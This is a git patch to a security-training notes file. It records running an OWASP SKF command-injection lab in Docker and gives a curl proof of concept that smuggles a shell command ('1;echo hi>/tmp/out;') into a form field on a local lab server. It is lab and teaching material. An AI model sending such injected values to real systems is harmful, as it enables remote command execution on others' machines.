From f026fed1d2a37be07a9d8acf31252ea07fe5c0ed Mon Sep 17 00:00:00 2001
From: Sander Hautvast <shautvast@gmail.com>
Date: Tue, 6 Feb 2024 10:50:21 +0100
Subject: [PATCH] Update proof.md

---
 Sectraining/proof.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/Sectraining/proof.md b/Sectraining/proof.md
index 4a06ed8..c227835 100644
--- a/Sectraining/proof.md
+++ b/Sectraining/proof.md
@@ -14,3 +14,15 @@ curl 'http://localhost:5000/update' \
   -H 'Cookie: JSESSIONID=DA8353D048C3C8B90D33596A10B2B360' \
   --data-raw 'color=yellow2'
 ```
+
+## ## blabla1337/owasp-skf-lab:java-cmd
+
+docker run -p5000:5000 blabla1337/owasp-skf-lab:java-cmd
+
+drop malicious payload in remote filesystem
+```bash
+curl 'http://localhost:5000/home' \
+   -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQJEtZoqQ8I4ZmYVs' \
+  --data-raw $'------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs\r\nContent-Disposition: form-data; name="size"\r\n\r\n1;echo hi>/tmp/out;\r\n------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs--\r\n' \
+  --compressed
+```